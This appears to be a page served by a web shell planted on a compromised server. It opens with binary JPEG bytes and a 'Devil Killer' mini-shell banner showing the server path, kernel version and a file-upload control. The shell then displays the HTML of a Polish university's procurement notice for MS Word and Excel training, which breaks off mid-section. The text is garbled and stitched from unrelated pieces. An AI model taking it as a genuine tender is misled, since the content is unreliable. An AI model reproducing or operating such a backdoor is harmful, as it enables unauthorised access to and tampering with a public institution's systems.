JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20230919/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20230919/0040251401-N-2023.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> WYKONANIE USŁUGI SZKOLENIOWEJ DLA AKADEMII SZTUK PIĘKNYCH IM. WŁADYSŁAWA STRZEMIŃSKIEGO W ŁODZI </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Akademia Sztuk Pięknych im. Władysława Strzemińskiego w Łodzi</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 000275790</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Wojska Polskiego 121</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Łódź</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">91-726</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">łódzkie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL711 - Miasto Łódź</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zamowienia.publiczne@asp.lodz.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://www.asp.lodz.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - uczelnia publiczna</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Edukacja</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> WYKONANIE USŁUGI SZKOLENIOWEJ DLA AKADEMII SZTUK PIĘKNYCH IM. WŁADYSŁAWA STRZEMIŃSKIEGO W ŁODZI </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-4c132de3-56c7-11ee-9aa3-96d3b4440790</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2023/BZP 00402514</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2023-09-19</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00122176/02/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.2 usługa szkoleniowa</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.13.) O zamówienie mogą ubiegać się wyłącznie wykonawcy, którzy spełniają warunki określone w art. 361 ustawy – usługi społeczne: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.15.) Nazwa projektu lub programu</h3> <p class="mb-0"> Projekt „Zintegrowany Program ASP w Łodzi 2” współfinansowany ze środków Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Wiedza Edukacja Rozwój Oś III Szkolnictwo wyższe dla gospodarki i rozwoju, Działanie 3.5 Kompleksowe programy szkół wyższych. </p> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/pn/asp.lodz <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">Komunikacja w postępowaniu o udzielenie zamówienia odbywa się przy użyciu środków komunikacji elektronicznej, za pośrednictwem platformy zakupowej pod adresem https://www.platformazakupowa.pl/transakcja/807068 zwanej dalej Platformą. Szczegółowe informacje dotyczące przyjętego w postępowaniu sposobu komunikacji, znajdują się w rozdziale III podrozdziale 1 niniejszej<br/>SWZ. Instrukcja korzystania z systemu dostępna jest pod adresem https://platformazakupowa.pl/strona/45-instrukcje<br/>b. Uwaga! Przed przystąpieniem do składania oferty, wykonawca jest zobowiązany zapoznać się z Instrukcją korzystania z Platformy zakupowej, dostępnej pod adresem: https://platformazakupowa.pl/strona/45-instrukcje</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. Postępowanie prowadzone jest w języku polskim w formie elektronicznej a komunikacja między Zamawiającym a Wykonawcami odbywa się drogą elektroniczną za pośrednictwem platformazakupowa.pl pod adresem: https://platformazakupowa.pl/pn/asp.lodz.<br/>2. W celu skrócenia czasu udzielenia odpowiedzi na pytania preferuje się, aby komunikacja między zamawiającym a wykonawcami, w tym wszelkie oświadczenia, wnioski, zawiadomienia oraz informacje, przekazywane były za pośrednictwem platformazakupowa.pl i formularza „Wyślij wiadomość do zamawiającego”.<br/>Oferta powinna być:<br/>a) sporządzona na podstawie załączników niniejszej SWZ w języku polskim,<br/>b) złożona przy użyciu środków komunikacji elektronicznej tzn. za pośrednictwem platformazakupowa.pl<br/>c) podpisana kwalifikowanym podpisem elektronicznym lub podpisem zaufanym lub podpisem osobistym przez osobę/osoby upoważnioną/upoważnione do reprezentowania wykonawcy<br/>d) Podpisy kwalifikowane wykorzystywane przez wykonawców do podpisywania wszelkich plików muszą spełniać “Rozporządzenie<br/>Parlamentu Europejskiego i Rady w sprawie identyfikacji elektronicznej i usług zaufania w odniesieniu do transakcji elektronicznych na rynku wewnętrznym (eIDAS) (UE) nr 910/2014 - od 1 lipca 2016 roku”.<br/>e) W przypadku wykorzystania formatu podpisu XAdES zewnętrzny Zamawiający wymaga dołączenia odpowiedniej ilości plików tj.<br/>podpisywanych plików z danymi oraz plików XAdES.<br/>f) Zgodnie z art. 18 ust. 3 ustawy Pzp, nie ujawnia się informacji stanowiących tajemnicę przedsiębiorstwa, w rozumieniu przepisów o zwalczaniu nieuczciwej konkurencji. Jeżeli wykonawca, nie później niż w terminie składania ofert, w sposób niebudzący wątpliwości zastrzegł, że nie mogą<br/>być one udostępniane oraz wykazał, załączając stosowne wyjaśnienia, iż zastrzeżone informacje stanowią tajemnicę przedsiębiorstwa. Na platformie w formularzu składania oferty znajduje się miejsce wyznaczone do dołączenia części oferty stanowiącej tajemnicę przedsiębiorstwa.<br/>g) Wykonawca, za pośrednictwem platformazakupowa.pl może przed upływem terminu do składania ofert zmienić lub wycofać ofertę. Sposób dokonywania zmiany lub wycofania oferty zamieszczono w instrukcji zamieszczonej na stronie internetowej pod<br/>adresem: https://platformazakupowa.pl/strona/45-instrukcje<br/>h) Każdy z wykonawców może złożyć tylko jedną ofertę. Złożenie większej liczby ofert lub oferty zawierającej propozycje wariantowe podlegać będzie odrzuceniu.<br/>i) Ceny oferty muszą zawierać wszystkie koszty, jakie musi ponieść wykonawca, aby zrealizować zamówienie z najwyższą starannością oraz ewentualne rabaty.<br/>j) Dokumenty i oświadczenia składane przez wykonawcę powinny być w języku polskim. W przypadku załączenia dokumentów sporządzonych w innym języku niż dopuszczony, wykonawca zobowiązany jest załączyć tłumaczenie na język polski.<br/>k) Zgodnie z definicją dokumentu elektronicznego z art. 3 ust 2 Ustawy o informatyzacji działalności podmiotów realizujących zadania publiczne,<br/>opatrzenie pliku zawierającego skompresowane dane kwalifikowanym podpisem elektronicznym jest jednoznaczne z podpisaniem oryginału<br/>dokumentu, z wyjątkiem kopii poświadczonych odpowiednio przez innego<br/>wykonawcę ubiegającego się wspólnie z nim o udzielenie zamówienia, przez podmiot, na którego zdolnościach lub sytuacji polega wykonawca, albo przez podwykonawcę.<br/>l) Maksymalny rozmiar jednego pliku przesyłanego za pośrednictwem dedykowanych formularzy do: złożenia, zmiany, wycofania oferty wynosi 150 MB natomiast przy komunikacji wielkość pliku to maksymalnie 500 MB</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z 04.05.2016, str. 1), dalej „RODO”, informuję, że: <br/>	administratorem Pani/Pana danych osobowych jest Akademia Sztuk Pięknych im. Władysława Strzemińskiego w Łodzi, ul. Wojska Polskiego 121, 91-726 Łódź, tel.: 42/2547400, ;<br/>	Kontakt w sprawie przetwarzania danych osobowych : iodo@asp.lodz.pl.<br/>Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z postępowaniem o udzielenie zamówienia publicznego <br/>na „ WYKONANIE USŁUGI SZKOLENIOWEJ DLA AKADEMII SZTUK PIĘKNYCH IM. WŁADYSŁAWA STRZEMIŃSKIEGO W ŁODZI”, nr postępowania: KBZ.261.33.2023, prowadzonym w trybie podstawowym na podstawie art. 275 ust. 1 ustawy Prawo zamówień publicznych.<br/>	odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu <br/>o art. 18 oraz art. 74 ustawy z dnia 11 września 2019r. – Prawo zamówień publicznych (tj. Dz. U. z 2021r. poz 1129 ze zm.), dalej „ustawa Pzp”; <br/>	Pani/Pana dane osobowe będą przetwarzane zgodnie z obowiązującymi przepisami prawa, w tym ustawy Prawo zamówień publicznych i ustawy o rachunkowości, a następnie archiwizowane zgodnie z Jednolitym rzeczowym wykazem akt ASP w Łodzi;<br/>	obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym określonym w przepisach ustawy Pzp, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z ustawy Pzp; <br/>	w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosowanie do art. 22 RODO;<br/>	posiada Pani/Pan:<br/>−	na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących;<br/>−	na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych **;<br/>	nie przysługuje Pani/Panu:<br/>−	w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>−	prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>−	na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">KBZ.261.33.2023</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">4</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część 1 – SZKOLENIE/Kurs MS WORD dla pracowników ASP Łódź<br/><br/>Cel szkolenia<br/>Szkolenie przygotowuje do samodzielnej pracy z programem MS Word.<br/><br/>Program szkolenia uwzględnia w szczególności<br/>1. Korespondencja seryjna<br/> - dokument główny<br/> - źródła danych<br/> - scalanie do pliku i na drukarkę<br/>2. Narzędzia<br/> - style i szablony dokumentów<br/> - stosowanie pól<br/> - tabele i listy – formatowanie, przekształcanie i sortowanie<br/> - wykresy<br/> - rysowanie i autokształty<br/> - tworzenie formularzy<br/> - schemat organizacyjny<br/> - edytor równań<br/> - wstawianie obiektów zewnętrznych<br/>3. Zarządzanie zawartością dokumentów<br/> - konspekt<br/> - indeks i spisy<br/> - przypisy i notatki<br/> - zakładki, odsyłacze<br/>4. Dostosowanie środowiska pracy<br/> - dostosowywanie pasków narzędzi<br/> - skróty klawiaturowe<br/> - makra<br/> - przypisywanie ustawień do dokumentu<br/>5. Praca rozproszona<br/> - dokument główny i podrzędne<br/> - wersje dokumentu<br/> - rejestracja zmian<br/> - Ochrona dokumentu. <br/>6. Metody szkoleniowe<br/>Szkolenie jest prowadzone metodami warsztatowymi, aktywizującymi uczestników.<br/>Metody opierają się na zasadzie „nauki przez doświadczenie”, pozwalającej<br/>uczestnikom szkolenia odnaleźć się w realnym otoczeniu zawodowym i w praktyczny<br/>sposób poznać i zastosować treści wykorzystywane na szkoleniu.<br/>Podczas szkolenia wykorzystane zostaną następujące metody szkoleniowe:<br/>• Krótkie wykłady z prezentacją multimedialną<br/>• Praktyczny warsztat komputerowy przygotowany przez trenera w oparciu o przykłady podane przez uczestników i trenera prowadzącego<br/>• Sesje pytań<br/>Podczas prowadzenia zajęć trener zwraca uwagę na:<br/>• Różnorodność zastosowanych metod i ich użyteczności dla słuchaczy<br/>• Regularne sprawdzanie nabytej wiedzy<br/>• Indywidualne podejście do każdego uczestnika<br/> Każdy z uczestników pracuje na własnym laptopie.<br/><br/>Materiały szkoleniowe<br/>Uczestnicy szkoleń otrzymają materiały szkoleniowe, zawierające najważniejsze zagadnienia, które będą wykorzystane podczas szkolenia jak również będą stanowić pomoc po ich zakończeniu. <br/>Każdy z uczestników szkolenia otrzyma imienny certyfikat potwierdzający ukończenie<br/>szkolenia.<br/>Trener prowadzący powinien być Expertem, praktykiem w dziedzinie szkoleń w zakresie Excela i Worda. Posiadać wykształcenie wyższe, doświadczenie w prowadzeniu szkoleń komputerowych, w szczególności szkoleń z zakresu obsługi aplikacji wchodzących w skład pakietu Microsoft Office - Microsoft Word, Microsoft Power Point, Microsoft Excel, Visual Basic for Application, Microsoft Access, Microsoft Project, odbyte szkolenie specjalistyczne dla trenerów uprawniające do prowadzenia szkoleń dydaktyczno-informatycznych dla nauczycieli „Nowe technologie w nauczaniu”. Uprawnienia egzaminacyjne: Egzaminator DIGITAL EUROPE Akredytacja uprawniająca do przeprowadzania egzaminu DIGITAL EUROPE (DigComp 2.0)<br/>Liczba uczestników: 3 grupy po 10 osób z możliwością zwiększenia. <br/>Szkolenie stacjonarne w siedzibie Zamawiającego, 1 dniowe, 6 godzinne, dwie przerwy po 20 min. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">80500000-9 - Usługi szkoleniowe</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2023-11-30</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie osoby wyznaczonej do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część 2 – Szkolenie kurs MS Excel – warsztaty komputerowe od podstaw<br/><br/>Cel szkolenia:<br/>Szkolenie przygotowuje do samodzielnej pracy z programem MS Excel. Uczestnicy poznają pracę z obiektami, formatowanie komórek, formuły i funkcje najczęściej wykorzystywane w codziennej pracy. Nauczą się pracy z wykresami, zarządzania skoroszytami, poznają tabele przestawne. Będą potrafili zarządzać danymi: importować, eksportować i zabezpieczać dane w Excelu.<br/><br/>Program szkolenia uwzględnia w szczególności<br/>1. Skróty klawiszowe: nawigacji, wpisywania, zaznaczania, wypełniania i formatowania obszarów<br/> - wpisywanie danych do tabeli<br/> - wpisywanie w określony obszar wartości (funkcji)<br/> - formatowanie obszaru<br/> - modyfikowanie obszaru<br/>2. Funkcje niezbędne a (prawie) nieznane, złożone formuły<br/> - funkcje tekstowe<br/> - funkcje daty i czasu<br/> - funkcje logiczne, przykład praktyczny arkusza raportu z użyciem funkcji logicznych<br/> - ważne a słabiej znane funkcje matematyczne<br/> - funkcje wyszukiwania i adresu<br/> - budowa złożonych formuł<br/>3. Tworzenie wykresów<br/> - tworzenie i modyfikacja wykresu<br/> - układ wykresu<br/>4. Zarządzanie listami<br/> - zmiana list w tabele<br/> - zmiana tekstu w kolumny<br/> - sortowanie i grupowanie<br/> - tworzenie raportów podsumowujących<br/>5. Praca z dużymi skoroszytami<br/> - zamrażanie fragmentu arkusza<br/> - dzielenie arkusza<br/> - edycja grupowa<br/> - wypełnienie we wszystkich arkuszach<br/> - konsolidacja danych<br/>6. Teoria baz danych<br/> - ODBC<br/> - rodzaje tabel, klucze, tabele faktów, wymiary analizy, miary analizy, słowniki<br/> - relacyjna baza danych i sposób jej budowy i analizy.<br/><br/>Materiały szkoleniowe<br/>Uczestnicy szkoleń otrzymają materiały szkoleniowe, zawierające najważniejsze zagadnienia, które będą wykorzystane podczas szkolenia jak również będą stanowić pomoc po ich zakończeniu. <br/>Każdy z uczestników szkolenia otrzyma imienny certyfikat potwierdzający ukończenie<br/>szkolenia.<br/>Trener prowadzący powinien być Expertem, praktykiem w dziedzinie szkoleń w zakresie Excela i Worda. Posiadać wykształcenie wyższe, odbyte Szkolenie specjalistyczne dla trenerów uprawniające do prowadzenia szkoleń dydaktyczno-informatycznych dla nauczycieli „Nowe technologie w nauczaniu”. Uprawnienia egzaminacyjne: Egzaminator DIGITAL EUROPE, Akredytacja uprawniająca do przeprowadzania egzaminu DIGITAL EUROPE (DigComp 2.0)<br/>Szkolenie stacjonarne w siedzibie Zamawiającego, 1 dniowe, 6 godzinnne, dwie przerwy po 20 min. <br/>Ilość uczestników: 10 osób </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">80500000-9 - Usługi szkoleniowe</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2023-11-30</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie osoby wyznaczonej do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część 3 – 